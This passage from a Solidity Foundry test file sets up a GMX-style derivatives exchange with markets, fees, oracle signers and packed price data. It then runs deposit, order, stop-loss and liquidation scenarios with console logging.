Role.CONTROLLER); // so it can call EventEmitter\\n _roleStore.grantRole(address(_oracle), Role.CONTROLLER); // so it can call EventEmitter\\n _roleStore.grantRole(address(this), Role.ORDER_KEEPER);\\n _roleStore.grantRole(address(this), Role.LIQUIDATION_KEEPER);\\n\\n \\n _marketProps1 = _marketFactory.createMarket(address(_sol), address(_wnt), address(_usdc), keccak256(abi.encode(\"sol-wnt-usdc\"))); \\n _marketPropsAB = _marketFactory.createMarket(address(0), address(_tokenA), address(_tokenB), keccak256(abi.encode(\"swap-tokenA-tokenB\"))); \\n _marketPropsBC = _marketFactory.createMarket(address(0), address(_tokenB), address(_tokenC), keccak256(abi.encode(\"swap-tokenB-tokenC\"))); \\n _marketPropsCwnt = _marketFactory.createMarket(address(0), address(_tokenC), address(_wnt), keccak256(abi.encode(\"swap-tokenC-wnt\"))); \\n \\n \\n _dataStore.setUint(Keys.minCollateralFactorForOpenInterestMultiplierKey(_marketProps1.marketToken, true), 1e25);\\n _dataStore.setUint(Keys.minCollateralFactorForOpenInterestMultiplierKey(_marketProps1.marketToken, false), 1e25);\\n \\n // see fees for the market\\n _dataStore.setUint(Keys.swapFeeFactorKey(_marketProps1.marketToken), 0.05e30); // 5%\\n _dataStore.setUint(Keys.SWAP_FEE_RECEIVER_FACTOR, 0.5e30);\\n _dataStore.setUint(Keys.positionFeeFactorKey(_marketProps1.marketToken), 0.00001234e30); // 2%\\n _dataStore.setUint(Keys.POSITION_FEE_RECEIVER_FACTOR, 0.15e30);\\n _dataStore.setUint(Keys.MAX_UI_FEE_FACTOR, 0.01e30);\\n _dataStore.setUint(Keys.uiFeeFactorKey(uiFeeReceiver), 0.01e30); // only when this is set, one can receive ui fee, so stealing is not easy\\n _dataStore.setInt(Keys.poolAmountAdjustmentKey(_marketProps1.marketToken, _marketProps1.longToken), 1);\\n _dataStore.setInt(Keys.poolAmountAdjustmentKey(_marketProps1.marketToken, _marketProps1.shortToken), 1);\\n _dataStore.setUint(Keys.swapImpactExponentFactorKey(_marketProps1.marketToken), 10e28);\\n 
_dataStore.setUint(Keys.swapImpactFactorKey(_marketProps1.marketToken, true), 0.99e30);\\n _dataStore.setUint(Keys.swapImpactFactorKey(_marketProps1.marketToken, false), 0.99e30);\\n\\n \\n \\n \\n // set gas limit to transfer a token\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_sol)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_wnt)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_usdc)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenA)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenB)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenC)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketProps1.marketToken)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsAB.marketToken)), 32000);\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsBC.marketToken)), 32000);\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsCwnt.marketToken)), 32000);\\n\\n\\n /* Configure the system parameters/limits here */\\n _dataStore.setUint(Keys.MAX_CALLBACK_GAS_LIMIT, 10000);\\n _dataStore.setUint(Keys.EXECUTION_GAS_FEE_BASE_AMOUNT, 100);\\n _dataStore.setUint(Keys.MAX_ORACLE_PRICE_AGE, 2 hours);\\n _dataStore.setUint(Keys.MIN_ORACLE_BLOCK_CONFIRMATIONS, 3);\\n _dataStore.setUint(Keys.MIN_COLLATERAL_USD, 1e30); // just require $1 as min collateral usd\\n _dataStore.setUint(Keys.reserveFactorKey(_marketProps1.marketToken, true), 5e29); // 50%\\n _dataStore.setUint(Keys.reserveFactorKey(_marketProps1.marketToken, false), 5e29);\\n _dataStore.setUint(Keys.fundingExponentFactorKey(_marketProps1.marketToken), 1.1e30); // 2 in 30 decimals like a square, cube, etc\\n _dataStore.setUint(Keys.fundingFactorKey(_marketProps1.marketToken), 0.0000001e30);\\n _dataStore.setUint(Keys.borrowingFactorKey(_marketProps1.marketToken, true), 0.87e30);\\n 
_dataStore.setUint(Keys.borrowingFactorKey(_marketProps1.marketToken, false), 0.96e30);\\n _dataStore.setUint(Keys.borrowingExponentFactorKey(_marketProps1.marketToken, true), 2.1e30);\\n _dataStore.setUint(Keys.borrowingExponentFactorKey(_marketProps1.marketToken, false), 2.3e30);\\n _dataStore.setUint(Keys.positionImpactExponentFactorKey(_marketProps1.marketToken), 2e30);\\n _dataStore.setUint(Keys.positionImpactFactorKey(_marketProps1.marketToken, true), 5e22); \\n _dataStore.setUint(Keys.positionImpactFactorKey(_marketProps1.marketToken, false), 1e23);\\n\\n // set the limit of market tokens\\n\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketProps1.marketToken, _marketProps1.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketProps1.marketToken, _marketProps1.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsAB.marketToken, _marketPropsAB.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsAB.marketToken, _marketPropsAB.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsBC.marketToken, _marketPropsBC.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsBC.marketToken, _marketPropsBC.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsCwnt.marketToken, _marketPropsCwnt.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsCwnt.marketToken, _marketPropsCwnt.shortToken), 1000e18);\\n \\n \\n // set max open interest for each market\\n _dataStore.setUint(Keys.maxOpenInterestKey(_marketProps1.marketToken, true), 1e39); // 1B $ \\n _dataStore.setUint(Keys.maxOpenInterestKey(_marketProps1.marketToken, false), 1e39); // 1B $\\n\\n _dataStore.setUint(Keys.maxPnlFactorKey(Keys.MAX_PNL_FACTOR_FOR_WITHDRAWALS, _marketProps1.marketToken, true), 10**29); // maxPnlFactor = 10% for long\\n _dataStore.setUint(Keys.maxPnlFactorKey(Keys.MAX_PNL_FACTOR_FOR_WITHDRAWALS, _marketProps1.marketToken, 
false), 10**29); // maxPnlFactor = 10% for short\\n // _dataStore.setBool(Keys.cancelDepositFeatureDisabledKey(address(_depositHandler)), true);\\n _dataStore.setBool(Keys.cancelOrderFeatureDisabledKey(address(_orderHandler), uint256(Order.OrderType.MarketIncrease)), true);\\n\\n addFourSigners();\\n address(_wnt).call{value: 10000e18}(\"\");\\n depositor1 = address(0x801);\\n depositor2 = address(0x802);\\n depositor3 = address(0x803);\\n\\n // make sure each depositor has some tokens.\\n _wnt.transfer(depositor1, 1000e18);\\n _wnt.transfer(depositor2, 1000e18);\\n _wnt.transfer(depositor3, 1000e18); \\n _usdc.transfer(depositor1, 1000e18);\\n _usdc.transfer(depositor2, 1000e18);\\n _usdc.transfer(depositor3, 1000e18);\\n _tokenA.transfer(depositor1, 1000e18);\\n _tokenB.transfer(depositor1, 1000e18);\\n _tokenC.transfer(depositor1, 1000e18); \\n\\n printAllTokens(); \\n }\\n\\n error Unauthorized(string);\\n // error Error(string);\\n\\n\\nfunction testLimit() public{\\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(\"Experiment 1 is completed.\"); \\n \\n // console2.log(\"PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP\");\\n \\n key = createMarketSwapOrder(depositor1, address(_wnt), 1e15); // create a deposit at block 3 which is within range (2, 6) \\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(\"Experiment 
2 is completed.\"); \\n \\n\\n console2.log(\"\\n\\n depositor 1 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 20e18, 1001e30, 106000000000000, true); // \\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(\"Experiment 3 is completed.\"); \\n \\n \\n\\n console2.log(\"\\n\\n depositor 2 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 110e18, 13e30, 101000000000000, false); // 110 usdc as collateral\\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(\"Experiment 4 is completed.\"); \\n \\n\\n\\n console2.log(\"PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP\");\\n vm.warp(2 days);\\n setIndexTokenPrice(priceParams, 98, 100); // send 20e18 USDC, increase $13.123 in a long position with trigger price 101\\n key = createLimitIncreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 23e18, 1.1234567e30, 101000000000000, true); // collateral token, usdsize, price\\n console2.log(\"a LimitIncrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"Experiment 5 is completed.\\n\"); \\n \\n\\n // depositor3 creates a LimitDecrease order\\n 
/*\\n setIndexTokenPrice(priceParams, 120, 125);\\n key = createLimitDecreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 120000000000000, 120000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(\"a LimitIncrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(\"Experiment 7 for is completed.\"); \\n */\\n}\\n\\nfunction testMarketDecrease() public{\\n \\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(\"Experiment 1 is completed.\"); \\n \\n \\n \\n \\n console2.log(\"\\n\\n depositor 2 deposit into marketProps1\");\\n key = createDepositNoSwap(_marketProps1, depositor2, 100e18, true);\\n _depositHandler.executeDeposit(key, priceParams);\\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor2);\\n printPoolsAmounts();\\n console2.log(\"Experiment 2 is completed.\"); \\n \\n \\n console2.log(\"\\n\\n depositor 1 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 20e18, 1e25, 
106000000000000, true); // \\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(\"Experiment 3 is completed.\"); \\n \\n \\n\\n console2.log(\"\\n\\n depositor 2 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 110e18, 1e25, 101000000000000, false); // 110 usdc as collateral\\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(\"Experiment 4 is completed.\"); \\n \\n console2.log(\"********************************************\");\\n\\n // deposit 2 will execute a marketDecreaseOrder now\\n key = createMarketDecreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 70000000000000, 5e23, false) ; // decrease by 5%\\n console2.log(\"a market desced order created with key: \");\\n console2.logBytes32(key);\\n console2.log(\"\\nExecuting the order// rest of code\"); \\n setIndexTokenPrice(priceParams, 60, 65); // we have a profit for a short position\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(\"Experiment 5 is completed.\"); \\n\\n printAllTokens();\\n} \\n\\n \\n\\nfunction testLiquidation() public{\\n // blockrange (2, 6)\\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = 
IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(\"Experiment 1 is completed.\"); \\n \\n \\n \\n \\n console2.log(\"\\n\\n depositor 2 deposit into marketProps1\");\\n key = createDepositNoSwap(_marketProps1, depositor2, 100e18, true);\\n _depositHandler.executeDeposit(key, priceParams);\\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor2);\\n printPoolsAmounts();\\n console2.log(\"Experiment 2 is completed.\"); \\n \\n \\n console2.log(\"\\n\\n depositor 1 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 10e18, 1e25, 106000000000000, true);\\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(\"Experiment 3 is completed.\"); \\n \\n \\n\\n console2.log(\"\\n\\n depositor 2 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.shortToken, 100e18, 1e25, 101000000000000, false);\\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.shortToken, false);\\n console2.log(\"Experiment 4 is completed.\"); \\n \\n \\n\\n // deposit 2 will execute a marketDecreaseOrder now\\n key = createMarketDecreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.shortToken, 106000000000000, 5e23, false) ; // decrease by 5%\\n console2.log(\"a market desced order created with key: \");\\n 
console2.logBytes32(key);\\n console2.log(\"\\nExecuting the order// rest of code\"); \\n setIndexTokenPrice(priceParams, 84, 90);\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.shortToken, false);\\n console2.log(\"Experiment 5 is completed.\"); \\n \\n \\n\\n \\n // depositor3 will execute a LimitIncrease Order now\\n key = createMarketIncreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 20e18, 200e30, 101000000000000, true); // collateral token, usdsize, price\\n console2.log(\"a LimitIncrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"Experiment 6 is completed.\\n\"); \\n \\n\\n // depositor3 creates a LimitDecrease order\\n setIndexTokenPrice(priceParams, 120, 125);\\n key = createLimitDecreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 120000000000000, 120000000000000, true); // retrieve $50? 
collateral token, usdsize, acceptible price\\n console2.log(\"a LimitIncrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(\"Experiment 7 for is completed.\"); \\n \\n // depositor3 creates a stopLossDecrease order\\n setIndexTokenPrice(priceParams, 97, 99);\\n key = createStopLossDecrease(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 95000000000000, 92000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(\"a StopLossDecrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n // Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams);\\n console2.log(\"Experiment 8 is completed.\"); \\n \\n \\n console2.log(\"\\n\\n*************************************************\\n\\n\");\\n\\n\\n // depositor3 creates a Liquidation order\\n setIndexTokenPrice(priceParams, 75, 75);\\n console2.log(\"Liquidate a position// rest of code\");\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n _liquidationHandler.executeLiquidation(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true, priceParams);\\n console2.log(\"Experiment 9 is completed.\"); \\n \\n\\n // printPoolsAmounts();\\n printAllTokens();\\n\\n \\n \\n \\n}\\n\\nfunction printAllTokens() startedCompleted(\"printAllTokens\") public\\n{\\n console2.log(\"\\nTokens used in this test:\");\\n console2.log(\"_wnt: \"); console2.logAddress(address(_wnt));\\n console2.log(\"_usdc: \"); 
console2.logAddress(address(_usdc));\\n console2.log(\"_sol: \"); console2.logAddress(address(_sol));\\n console2.log(\"_tokenA: \"); console2.logAddress(address(_tokenA));\\n console2.log(\"_tokenB: \"); console2.logAddress(address(_tokenB));\\n console2.log(\"_tokenC: \"); console2.logAddress(address(_tokenC));\\n console2.logString(\"test contract address:\"); console2.logAddress(address(this));\\n \\n console2.log(\"_marketProps1 market token: \"); console2.logAddress(address(_marketProps1.marketToken));\\n console2.log(\"_marketPropsAB market token: \"); console2.logAddress(address(_marketPropsAB.marketToken));\\n console2.log(\"_marketPropsBC market token: \"); console2.logAddress(address(_marketPropsBC.marketToken));\\n console2.log(\"_marketProps1Cwnt market token: \"); console2.logAddress(address(_marketPropsCwnt.marketToken));\\n console2.log(\"\\n\");\\n \\n \\n}\\n\\n\\nfunction printMarketTokenAmount() public \\n{ console2.log(\"Market token address: \");\\n console2.logAddress(address(_marketProps1.marketToken));\\n console2.log(\"depositor1 market token amount: %d\", IERC20(_marketProps1.marketToken).balanceOf(depositor1));\\n console2.log(\"depositor2 market token amount: %d\", IERC20(_marketProps1.marketToken).balanceOf(depositor2));\\n console2.log(\"depositor3 market token amount: %d\", IERC20(_marketProps1.marketToken).balanceOf(depositor3));\\n}\\n\\nfunction printLongShortTokens(address account) public\\n{\\n console2.log(\"balance for \"); console2.logAddress(account);\\n console2.log(\"_wnt balance:\", _wnt.balanceOf(account));\\n console2.log(\"usdc balance:\", _usdc.balanceOf(account));\\n}\\n\\n\\n\\n\\nfunction addFourSigners() private {\\n _oracleStore.addSigner(address(901));\\n _oracleStore.addSigner(address(902)); \\n _oracleStore.addSigner(address(903)); \\n _oracleStore.addSigner(address(904)); \\n}\\n\\n\\nfunction setIndexTokenPrice(OracleUtils.SetPricesParams memory priceParams, uint256 minP, uint256 maxP) public\\n{\\n uint256 
mask1 = ~uint256(type(uint96).max); // (32*3 of 1's)\\n console2.logBytes32(bytes32(mask1));\\n\\n uint256 minPrice = minP;\\n minPrice = minPrice << 32 | minP;\\n minPrice = minPrice << 32 | minP;\\n\\n uint256 maxPrice = maxP;\\n maxPrice = maxPrice << 32 | maxP;\\n maxPrice = maxPrice << 32 | maxP;\\n\\n priceParams.compactedMinPrices[0] = (priceParams.compactedMinPrices[0] & mask1) | minPrice;\\n priceParams.compactedMaxPrices[0] = (priceParams.compactedMaxPrices[0] & mask1) | maxPrice;\\n}\\n\\n\\nfunction createSetPricesParams() public returns (OracleUtils.SetPricesParams memory) {\\n uint256 signerInfo = 3; // signer 904\\n signerInfo = signerInfo << 16 | 2; // signer 903\\n signerInfo = signerInfo << 16 | 1; // signer 902\\n signerInfo = signerInfo << 16 | 3; // number of singers\\n // will read out as 902, 903, 904 from the lowest first\\n\\n // the number of tokens, 6\\n address[] memory tokens = new address[](6);\\n tokens[0] = address(_sol);\\n tokens[1] = address(_wnt);\\n tokens[2] = address(_usdc);\\n tokens[3] = address(_tokenA);\\n tokens[4] = address(_tokenB);\\n tokens[5] = address(_tokenC);\\n\\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n uint256[] memory compactedMinOracleBlockNumbers = new uint256[](2);\\n compactedMinOracleBlockNumbers[0] = block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n\\n compactedMinOracleBlockNumbers[1] = block.number+1;\\n compactedMinOracleBlockNumbers[1] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n \\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 
64*4 for one element, so need two elements \\n \\n uint256[] memory compactedMaxOracleBlockNumbers = new uint256[](2);\\n compactedMaxOracleBlockNumbers[0] = block.number+5; \\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5;\\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5; \\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5; \\n\\n compactedMaxOracleBlockNumbers[1] = block.number+5; \\n compactedMaxOracleBlockNumbers[1] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5;\\n\\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n uint256[] memory compactedOracleTimestamps = new uint256[](2);\\n compactedOracleTimestamps[0] = 9;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 8;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 7;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 7;\\n \\n compactedOracleTimestamps[1] = 9;\\n compactedOracleTimestamps[1] = compactedOracleTimestamps[0] << 64 | 8;\\n \\n\\n // must be equal to the number of tokens, 8 for each, so 8*6= 48, only need one element\\n uint256[] memory compactedDecimals = new uint256[](1);\\n compactedDecimals[0] = 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 32 bits, so each 8 entries takes one element, we need 3 elements\\n // price table:\\n // SOL: 100 101 102\\n // wnt: 200 201 203\\n // USDC 1 1 1\\n // tokenA 100 101 102\\n // tokenB 200 202 204\\n // tokenC 400 404 408\\n\\n uint256[] memory 
compactedMinPrices = new uint256[](3);\\n compactedMinPrices[2] = 408; \\n compactedMinPrices[2] = compactedMinPrices[2] << 32 | 404;\\n\\n compactedMinPrices[1] = 400;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 204;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 202;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 200;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 102;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 101;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 100;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 1;\\n \\n compactedMinPrices[0] = 1;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 1;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 203;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 201;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 200;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 102;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 101;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 100;\\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 8 bits, so we just need one element\\n\\n uint256[] memory compactedMinPricesIndexes = new uint256[](1);\\n compactedMinPricesIndexes[0] = 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = 
compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 32 bits, so each 8 entries takes one element, we need 3 elements\\n // price table:\\n // SOL: 105 106 107\\n // wnt: 205 206 208\\n // USDC 1 1 1\\n // tokenA 105 106 107\\n // tokenB 205 207 209\\n // tokenC 405 409 413\\n uint256[] memory compactedMaxPrices = new uint256[](3);\\n compactedMaxPrices[2] = 413;\\n compactedMaxPrices[2] = compactedMaxPrices[2] << 32 | 409;\\n \\n compactedMaxPrices[1] = 405;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 209;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 207;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 205;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 107;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 106;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 105;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 1;\\n\\n compactedMaxPrices[0] = 1;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 1;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 208;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 206; \\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 205; \\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 107;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 106;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 105;\\n \\n \\n // three signers, 6 tokens, so we have 3*6 = 
